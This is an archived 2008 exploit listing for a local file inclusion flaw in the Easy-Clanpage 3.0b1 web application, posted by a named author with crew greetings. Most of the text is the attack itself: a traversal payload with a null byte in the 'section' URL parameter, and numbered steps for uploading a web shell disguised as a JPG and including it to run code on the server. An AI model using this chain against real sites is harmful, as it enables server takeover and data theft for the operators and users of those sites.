Easy-Clanpage 3.0b1 (section) Local File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Easy-Clanpage 3.0b1 (section) Local File Inclusion Vulnerability
# Published : 2008-06-13
# Author : Loader007
# Previous Title : Butterfly Organizer 2.0.0 Arbitrary Delete (Category/Account) Exploit
# Next Title : WebChamado 1.1 (tsk_id) Remote SQL Injection Vulnerability

####################################################################################
#LFI Exploit by Loader007
#
#you can connect me for questions ICQ:488525928
#
#Script:Easy-Clanpage 3.0b1
#
#download: 
http://www.easy-clanpage.de/?section=downloads&show=viewdownload&id=24
#
#http://example.de/path/?section=[LFI]%00
#
###################################################################################
#HowTo use it
#
#1: make a account
#2: up shell as jpg not bigger than 50kb!
#3: incude the jpg with http://example.de/path/?section=../path/to/image%00
#
#greetz to
#sys-flaw.com
#my friend's Tr0n,N1ReeXz and all the others
###################################################################################

# www.Syue.com [2008-06-13]